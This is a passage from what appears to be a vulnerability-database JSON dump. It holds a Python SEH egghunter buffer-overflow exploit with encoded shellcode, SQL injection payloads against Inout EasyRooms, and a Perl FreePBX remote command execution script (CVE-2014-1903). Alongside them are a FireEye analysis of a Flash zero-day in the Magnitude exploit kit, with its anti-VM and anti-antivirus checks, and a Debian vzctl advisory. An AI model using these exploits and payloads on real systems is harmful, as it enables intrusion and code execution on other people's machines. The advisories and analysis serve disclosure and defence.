\"\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\"\r\negghunter += \"\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\"\r\negghunter += \"\\x42\\x75\\x4a\\x49\\x70\\x66\\x4c\\x4c\\x78\\x4b\\x6b\\x30\"\r\negghunter += \"\\x49\\x6b\\x54\\x63\\x42\\x55\\x74\\x4a\\x66\\x51\\x69\\x4b\"\r\negghunter += \"\\x36\\x51\\x38\\x52\\x36\\x33\\x52\\x73\\x36\\x33\\x36\\x33\"\r\negghunter += \"\\x38\\x33\\x4f\\x30\\x71\\x76\\x4d\\x51\\x6b\\x7a\\x39\\x6f\"\r\negghunter += \"\\x66\\x6f\\x47\\x32\\x36\\x32\\x4d\\x50\\x59\\x6b\\x59\\x50\"\r\negghunter += \"\\x33\\x44\\x57\\x78\\x43\\x5a\\x66\\x62\\x72\\x78\\x78\\x4d\"\r\negghunter += \"\\x44\\x6e\\x73\\x6a\\x7a\\x4b\\x37\\x62\\x52\\x4a\\x71\\x36\"\r\negghunter += \"\\x61\\x48\\x55\\x61\\x69\\x59\\x6f\\x79\\x79\\x72\\x70\\x64\"\r\negghunter += \"\\x59\\x6f\\x75\\x43\\x73\\x6a\\x6e\\x63\\x57\\x4c\\x71\\x34\"\r\negghunter += \"\\x47\\x70\\x42\\x54\\x76\\x61\\x72\\x7a\\x57\\x4c\\x37\\x75\"\r\negghunter += \"\\x74\\x34\\x7a\\x76\\x6c\\x78\\x72\\x57\\x46\\x50\\x76\\x50\"\r\negghunter += \"\\x63\\x44\\x6d\\x59\\x59\\x47\\x4e\\x4f\\x71\\x65\\x4e\\x31\"\r\negghunter += \"\\x6e\\x4f\\x51\\x65\\x38\\x4e\\x79\\x6f\\x4b\\x57\\x41\\x41\"\r\n\r\negghunter10 = \"\\x8b\\x7c\\x24\\x08\\xbe\\xe9\\xfe\\xff\\xff\\xf7\\xde\\x29\"\r\negghunter10 += \"\\xf7\\x57\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\"\r\negghunter10 += \"\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x51\\x5a\\x6a\\x41\"\r\negghunter10 += \"\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\"\r\negghunter10 += \"\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\"\r\negghunter10 += \"\\x41\\x42\\x75\\x4a\\x49\\x4d\\x53\\x5a\\x4c\\x34\\x70\\x50\"\r\negghunter10 += \"\\x31\\x69\\x42\\x30\\x52\\x70\\x52\\x30\\x52\\x62\\x46\\x4e\"\r\negghunter10 += \"\\x6c\\x4a\\x6b\\x6b\\x30\\x59\\x6b\\x76\\x43\\x44\\x35\\x54\"\r\negghunter10 += \"\\x42\\x4d\\x63\\x59\\x50\\x30\\x66\\x4b\\x31\\x59\\x5a\\x69\"\r\negghunter10 += \"\\x6f\\x56\\x6f\\x43\\x72\\x31\\x42\\x6b\\x30\\x39\\x6b\\x6f\"\r\negghunter10 += \"\\x30\\x44\\x34\\x44\\x4c\\x48\\x38\\x64\\x7a\\x39\\x6e\\x39\"\r\negghunter10 += \"\\x6f\\x49\\x6f\\x6c\\x37\\x4b\\x68\\x68\\x4d\\x64\\x6e\\x72\"\r\negghunter10 += \"\\x7a\\x58\\x6b\\x47\\x61\\x54\\x71\\x4b\\x6b\\x76\\x33\\x31\"\r\negghunter10 += \"\\x43\\x76\\x33\\x50\\x6a\\x45\\x79\\x46\\x38\\x78\\x33\\x39\"\r\negghunter10 += \"\\x50\\x45\\x34\\x49\\x6f\\x46\\x73\\x4f\\x73\\x4b\\x74\\x66\"\r\negghunter10 += \"\\x6c\\x72\\x7a\\x65\\x6c\\x46\\x65\\x54\\x34\\x5a\\x73\\x78\"\r\negghunter10 += \"\\x38\\x51\\x67\\x34\\x70\\x30\\x30\\x30\\x74\\x4b\\x39\\x78\"\r\negghunter10 += \"\\x57\\x6e\\x4f\\x42\\x55\\x48\\x4e\\x4e\\x4f\\x74\\x35\\x5a\"\r\negghunter10 += \"\\x6b\\x69\\x6f\\x4b\\x57\\x41\\x41\"\r\n\r\njmpback = \"\\xe9\\xdc\\xfe\\xff\\xff\" # jmp back\r\nnseh = \"\\xeb\\xf9\\x90\\x90\" # jmp Short back\r\nseh = \"\\x40\\x15\\x40\" # Overwrite Seh - Golden Pivot !!\r\n\r\nbuffer = egghunter\r\nbuffer += \"\\x41\" * (bufsize-len(buffer)-len(jmpback))\r\nbuffer += jmpback\r\nbuffer += nseh\r\nbuffer += seh\r\nprint \"[+] Creating %s bytes payload for winxp and windows 7 ...\" %len(buffer)\r\nf = open (\"egghunter-winxp-win7.txt\", \"w\")\r\nprint \"[+] File created!\"\r\nf.write(buffer)\r\nf.close()\r\n\r\nbuffer = egghunter10\r\nbuffer += \"\\x41\" * (bufsize-len(buffer)-len(jmpback))\r\nbuffer += jmpback\r\nbuffer += nseh\r\nbuffer += seh\r\nprint \"[+] Creating %s bytes payload for windows 10 ...\" %len(buffer)\r\nf = open (\"egghunter-win10.txt\", \"w\")\r\nprint \"[+] File created!\"\r\nf.write(buffer)\r\nf.close()\n\n# 0day.today [2019-04-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32472"}, {"lastseen": "2019-04-03T13:35:48", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2019-04-02T00:00:00", "published": "2019-04-02T00:00:00", "id": "1337DAY-ID-32466", "href": "https://0day.today/exploit/description/32466", "title": "Inout EasyRooms - SQL Injection Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Inout EasyRooms Ultimate Edition - SQL Injection\r\n# Exploit Author: Ahmet \u00dcmit BAYRAM\r\n# Vendor Homepage: https://www.inoutscripts.com/products/inout-easyrooms/\r\n# Demo Site: http://inout-easyrooms.demo.inoutscripts.net/\r\n# Version: v1.0\r\n# Tested on: Kali Linux\r\n# CVE: N/A\r\n\r\n----- PoC 1: SQLi -----\r\n\r\nRequest: http://localhost/[PATH]/search/rentals\r\nVulnerable Parameter: guests (POST)\r\nPayload: guests=-1' OR 3*2*1=6 AND 00046=00046 --\r\n\r\n----- PoC 2: SQLi -----\r\n\r\nRequest: http://localhost/[PATH]/search/searchdetailed\r\nVulnerable Parameter: location (POST)\r\nPayload: location=-1' OR 3*2*1=6 AND 000603=000603 or 'UeNQc30f'='\r\n\r\n----- PoC 3: SQLi -----\r\n\r\nRequest: http://localhost/[PATH]/search/searchdetailed\r\nVulnerable Parameter: numguest (POST)\r\nPayload: numguest=-1' OR 3*2*1=6 AND 000232=000232 --\r\n\r\n\r\n----- PoC 4: SQLi -----\r\n\r\nRequest: http://localhost/[PATH]/search/searchdetailed\r\nVulnerable Parameter: property1 (POST)\r\nPayload:\r\nproperty1=(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'\"+(select(0)from(select(sleep(0)))v)+\"*/\n\n# 0day.today [2019-04-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32466"}], "fireeye": [{"lastseen": "2017-03-07T16:24:19", "bulletinFamily": "info", "description": "On April 2, security researcher @Kafeine at Proofpoint [discovered a change to the Magnitude Exploit Kit](<https://www.proofpoint.com/us/threat-insight/post/killing-zero-day-in-the-egg>). Thanks to their collaboration, we analyzed the sample and discovered that Magnitude EK was exploiting a previously unknown vulnerability in Adobe Flash Player (CVE-2016-1019). The in-the-wild exploit achieves remote code execution on recent versions of Flash Player, but fails on the latest version (21.0.0.197).\n\nWhile version 21.0.0.197 is vulnerable to this exploit, execution fails because Adobe introduced new exploit mitigations in version 21.0.0.182 of Flash Player. This was a great move from Adobe that shows how valuable innovations into exploit mitigations can be. Before the exploit kit authors could devise a way around the new mitigations, Adobe patched the underlying vulnerability.\n\n##### Exploit Delivery Chain \n\n\nMagnitude EK recently updated its delivery chain. It added a profile gate, just like Angler EK, which collects the screen\u2019s dimensions and color depth (Figure 1).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Flash%200day%20Genwei%20Jang/fig1.jpg)\n\nFigure 1. JS of Profile Gate\n\nThe server responds with another profiling page, which tries to avoid sending exploits to users browsing from virtual machines or with certain antivirus programs installed (Figure 2). See the appendix for the full list of checks performed.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Flash%200day%20Genwei%20Jang/fig2.jpg)\n\nFigure 2. JS of redirecting to main exploit page\n\nIn our tests, Magnitude EK delivered the JSON double free exploit (CVE-2015-2419) and a small Flash loader that renders the new Flash exploit (Figure 3).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Flash%200day%20Genwei%20Jang/fig3.jpg)\n\nFigure 3. JS of loading exploits\n\n##### The Flash Exploit\n\nA memory corruption vulnerability exists in an undocumented ASnative API. The exploit causes the flash memory allocator to allocate buffers under the attacker\u2019s control. The attacker can then create a ByteArray of length 0xFFFFFFFF such that it can read and write arbitrary memory, as seen in Figure 4. The exploit\u2019s code layout and some of the functionalities are similar to the leaked HackingTeam exploits, in that it downloads malware from another server and executes it.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Flash%200day%20Genwei%20Jang/fig4.jpg)\n\nFigure 4. ActionScript of Flash exploits\n\n##### Conclusion\n\nThis is not the first time that new exploit mitigation research rendered an in-the-wild zero-day exploit ineffective. Exploit mitigations are an invaluable tool for the industry, and their ongoing development within some of the most widely targeted applications \u2013 such as Internet Explorer/Edge and Flash Player \u2013 change the game.\n\nDespite regular security updates, attackers continue to target Flash Player, primarily because of its ubiquity and cross-platform reach. If Flash Player is required in your environment, ensure that you update to the latest version, and consider the use of mitigation tools such as [EMET](<https://support.microsoft.com/en-us/kb/2458544>) from Microsoft. \n \nClick [here](<https://helpx.adobe.com/security/products/flash-player/apsb16-10.html>) for the security bulletin issued by Adobe.\n\n##### Acknowledgements\n\nA huge thank you to @Kafeine, without whom this discovery would not be possible. His diligence continues to keep this industry at pace with exploit kit authors around the world.\n\n##### Appendix\n\nres://\\Program%20Files%20(x86)\\Fiddler2\\Fiddler.exe/#3/#32512 \nres://\\Program%20Files\\Fiddler2\\Fiddler.exe/#3/#32512 \nres://\\Program%20Files%20(x86)\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#26567 \nres://\\Program%20Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#26567 \nres://\\Program%20Files%20(x86)\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#30996 \nres://\\Program%20Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#30996 \nres://\\Program%20Files%20(x86)\\Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/#110 \nres://\\Program%20Files\\Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/#110 \nres://\\Program%20Files%20(x86)\\Parallels\\Parallels Tools\\Applications\\setup_nativelook.exe/#2/#204 \nres://\\Program%20Files\\Parallels\\Parallels Tools\\Applications\\setup_nativelook.exe/#2/#204 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Malware\\mbamext.dll/#2/202 \nres://\\Program%20Files\\Malwarebytes Anti-Malware\\mbamext.dll/#2/202 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Malware\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files\\Malwarebytes Anti-Malware\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Exploit\\mbae.exe/#2/200 \nres://\\Program%20Files\\Malwarebytes Anti-Exploit\\mbae.exe/#2/200 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Exploit\\mbae.exe/#2/201 \nres://\\Program%20Files\\Malwarebytes Anti-Exploit\\mbae.exe/#2/201 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Exploit\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files\\Malwarebytes Anti-Exploit\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files%20(x86)\\Trend Micro\\Titanium\\TmConfig.dll/#2/#30994 \nres://\\Program%20Files\\Trend Micro\\Titanium\\TmConfig.dll/#2/#30994 \nres://\\Program%20Files%20(x86)\\Trend Micro\\Titanium\\TmSystemChecking.dll/#2/#30994 \nres://\\Program%20Files\\Trend Micro\\Titanium\\TmSystemChecking.dll/#2/#30994 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0 for Windows Workstations\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0 for Windows Workstations\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky PURE 2.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky PURE 2.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky PURE 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky PURE 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky CRYSTAL 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky CRYSTAL 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky PURE\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky PURE\\mfc42.dll/#2/#26567\n", "modified": "2016-04-07T08:30:00", "published": "2016-04-07T08:30:00", "id": "FIREEYE:1A61A821CE69D378830204326B2E938C", "href": "https://www.fireeye.com/blog/threat-research/2016/04/cve-2016-1019_a_new.html", "title": "CVE-2016-1019: A New Flash Exploit Included in Magnitude Exploit Kit", "type": "fireeye", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:11:01", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3357-1 security@debian.org\r\nhttps://www.debian.org/security/ Moritz Muehlenhoff\r\nSeptember 13, 2015 https://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : vzctl\r\nCVE ID : not yet available\r\n\r\nIt was discovered that vzctl, a set of control tools for the OpenVZ\r\nserver virtualisation solution, determined the storage layout of\r\ncontainers based on the presense of an XML file inside the container.\r\nAn attacker with local root privileges in a simfs-based container\r\ncould gain control over ploop-based containers. Further information on\r\nthe prerequites of such an attack can be found at\r\nhttps://src.openvz.org/projects/OVZL/repos/vzctl/commits/9e98ea630ac0e88b44e3e23c878a5166aeb74e1c\r\n\r\nThe oldstable distribution (wheezy) is not affected.\r\n\r\nFor the stable distribution (jessie), this problem has been fixed in\r\nversion 4.8-1+deb8u2. During the update existing configurations are\r\nautomatically updated.\r\n\r\nFor the testing distribution (stretch), this problem has been fixed\r\nin version 4.9.4-2.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 4.9.4-2.\r\n\r\nWe recommend that you upgrade your vzctl packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niQIcBAEBAgAGBQJV9XVNAAoJEBDCk7bDfE42wH8QAKu1HMclVr6qaMzXLzdKJnFh\r\nvToZwqzLqcG7wcMMBDEjWDxvJqkUqaJNs1h2RVgy3hwoOo/rZA1tM0+rsubXxXai\r\nb5TN30vexwkMC+DHmJ7UcdP+CZSFfOv6iLXjP7BTVC+th/CrT+wlaaXlawar7oFn\r\nGebJtggNOCLiRRCG16xP+Hg0fPASYe7M7JlgkwugVBJKL0gd5PYdgifsqgplCSIG\r\nFTELm3rl9hhPveO4owBpEfC/o2EURSrzJs/6wgYfr2tKq56udiRD2egGYVMMCsFT\r\nvd8ufZcjXl0yHwH1UdY4rzncCwRNjf/SICFmfAsRiRDSc4GB45x5+bdYosywcjdR\r\nQEiHPwVsoFD6vvo3yVYkANoO9r20qS+lEV8gbYE/sZua6lWvYqG3ezh+FseyJxNK\r\nmLJHy16TA5mhvqFwb4kX1i1pmsxhcC0nzfN+5kPMZM65t5jUSZ/Ctsq+NqiLXQ74\r\naBMabN6GdlseksaR7jbzQsbkng1PRAfZfRMExsXI1lyK1nln0tQ7P8PGIcjwWHX9\r\nY9u+Zsa/73sDfIir/kIqHvqIwfLHBObjUQYNThIMO8iRssdPtuj7MvYhPcecy+Dy\r\nuXp3hdqATIEo0tHf9tJT3zL9SJJxAc3c/wRvLuk+eFvFlgC1Gkb5Koc1BJpyn2hB\r\nwRhAME+VvMLR9Tg7c5LS\r\n=MiSK\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2015-09-15T00:00:00", "published": "2015-09-15T00:00:00", "id": "SECURITYVULNS:DOC:32512", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32512", "title": "[SECURITY] [DSA 3357-1] vzctl security update", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "description": "It's possible to get control over ploop-based containers.", "modified": "2015-09-15T00:00:00", "published": "2015-09-15T00:00:00", "id": "SECURITYVULNS:VULN:14695", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14695", "title": "vzctl privilege escalation", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "seebug": [{"lastseen": "2017-11-19T13:30:14", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-85513", "id": "SSV:85513", "type": "seebug", "title": "FreePBX 2.11.0 - Remote Command Execution", "sourceData": "\n #!/usr/bin/perl\r\nuse strict;\r\nuse warnings;\r\nuse IO::Socket::INET;\r\n\r\n# Exploit Title: FreePBX 2.9,2.10,2.11,12 Remote Command Execution\r\n# Google Dork: n/a\r\n# Date: 2/25/14\r\n# Exploit Author: @0x00string\r\n# Vendor Homepage: http://www.freepbx.org/\r\n# Software Link: http://mirror.freepbx.org/freepbx-2.11.0.tar.gz\r\n# Version: 2.11 tested working\r\n# Tested on: Ubuntu 12.04, 13.10\r\n# CVE : CVE-2014-1903\r\n\r\n\r\n#\tReferences:\r\n#\thttp://seclists.org/bugtraq/2014/Feb/42\r\n#\thttp://issues.freepbx.org/browse/FREEPBX-7123\r\n#\thttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1903\r\n#\r\n#\tDeveloper Advisory:\r\n#\thttp://www.freepbx.org/news/2014-02-06/security-vulnerability-notice\r\n\r\n\r\n\r\n# in /admin/config.php\r\n#\t// handle special requests\r\n#\tif (!isset($no_auth) && isset($_REQUEST['handler'])) {\r\n#\t\t$module = isset($_REQUEST['module'])\t? $_REQUEST['module']\t: '';\r\n#\t\t$file \t= isset($_REQUEST['file'])\t\t? $_REQUEST['file']\t\t: '';\r\n#\t\tfileRequestHandler($_REQUEST['handler'], $module, $file);\r\n#\t\texit();\r\n#\t}\r\n\r\n\r\n# in /admin/library/view.functions.php\r\n#\t case 'api':\r\n#\t if (isset($_REQUEST['function']) && function_exists($_REQUEST['function'])) {\r\n#\t $function = $_REQUEST['function'];\r\n#\t $args = isset($_REQUEST['args'])?$_REQUEST['args']:'';\r\n#\t\r\n#\t //currently works for one arg functions, eventually need to clean this up to except more args\r\n#\t $result = $function($args);\r\n#\t $jr = json_encode($result);\r\n#\t } else {\r\n#\t $jr = json_encode(null);\r\n#\t }\r\n#\t header("Content-type: application/json");\r\n#\t echo $jr;\r\n#\t break;\r\n\r\n\r\n$| = 1;\r\n\r\nmy $sock = new IO::Socket::INET (\r\n PeerHost => $ARGV[0],\r\n PeerPort => '80',\r\n Proto => 'tcp',\r\n);\r\ndie "$!\\n" unless $sock;\r\nmy $func = $ARGV[1];\r\nmy $args = "";\r\nmy $i = 0;\r\nmy $max = 1;\r\nforeach(@ARGV) {\r\n\tif ($i > 1) {\r\n\t\t$args .= $_;\r\n\t}\r\n\tunless($i > (scalar(@ARGV) - 2)) {\r\n\t\t$args .= "%20";\r\n\t}\r\n\t$i++;\r\n}\r\nmy $payload = "display=A&handler=api&file=A&module=A&function=" . $func . "&args=" . $args;\r\nchomp($payload);\r\nprint "payload is " . $payload . "\\n";\r\nmy $packet = \t"GET http://" . $ARGV[0] . "/admin/config.php?" . $payload . "\\r\\n\\r\\n";\r\nmy $size = $sock->send($packet);\r\nshutdown($sock, 1);\r\nmy $resp;\r\n$sock->recv($resp, 1024);\r\nprint $resp . "\\n";\r\n$sock->close();\r\nexit(0);\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-85513", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T17:28:55", "bulletinFamily": "exploit", "description": "CVE ID:CVE-2014-1903\r\n\r\nFreePBX\u662f\u5f00\u6e90Web PBX\u89e3\u51b3\u65b9\u6848\u3002\r\n\r\nFreePBX admin/libraries/view.functions.php\u6ca1\u6709\u9650\u5236API\u5904\u7406\u7a0b\u5e8f\u53ef\u8bbf\u95ee\u7684\u51fd\u6570\u96c6\uff0c\u8fd9\u53ef\u4f7f\u8fdc\u7a0b\u653b\u51fb\u8005\u901a\u8fc7 admin/config.php \u7684\u51fd\u6570\u548c\u53c2\u6570\uff0c\u5229\u7528\u6b64\u6f0f\u6d1e\u6267\u884c\u4efb\u610fPHP\u4ee3\u7801\u3002\r\n0\r\nFreePBX 